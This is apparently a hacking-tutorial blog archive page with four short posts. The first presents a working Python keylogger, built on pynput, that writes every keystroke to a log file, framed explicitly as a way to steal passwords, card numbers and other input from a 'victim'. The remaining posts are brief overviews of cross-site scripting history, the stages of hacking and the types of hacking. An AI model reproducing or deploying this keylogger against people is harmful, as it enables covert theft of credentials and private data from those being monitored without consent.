Posts

Showing posts from August, 2021

KeyLogger

Image
Key Logger: Hi guys,  Today we are going to see about Key Logger using Python. Keyloggers are  activity-monitoring software programs that give hackers access to your personal data . The passwords and credit card numbers you type, the webpages you visit – all by logging your keyboard strokes. The software is installed on your computer, and records everything you type. Keylogger is used to steal letters of our victim who we want to hack. Before we going to see Python keylogger scripts,  we want to install two python libraries, 01. keyboard :   https://pypi.org/project/keyboard / 02. pynput :   https://pypi.org/project/pynput/ Now we can see our scripts, Code: from pynput.keyboard import Key, Listener import logging   logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")   def on_press(key):     logging.info(str(key))   with Listener(on_press=on_press) as listener :     listener.join() -----------------------------------

History of Cross-Site Scripting

Image
 History of XSS # XSS vulnerabilities exists since the early days of the Web. # In 1999, inspired by the work of Georgi Guninski, David Ross published the first paper on XSS flaws entitled “Script Injection.” # In 2005, the first XSS worm known as Samy attacked the popular social networking Web site MySpace.

Stages of Hacking:

Image
  Stages of Hacking:     There are five stage of hacking. They are,          ✅ Reconnaissance           ✅ Scanning & Enumeration           ✅ Exploitation           ✅ Maintaining Access           ✅ Clearing Tracks Happy Learning

Types of Hacking:

Hi guys, Happy Reading and Hacking Hacking is also known as Penetration Testing or Exploiting. Three types of Hacking: There are three types of hacking. They are: ✔ White box Hacking ✔ Grey box Hacking ✔ Black box Hacking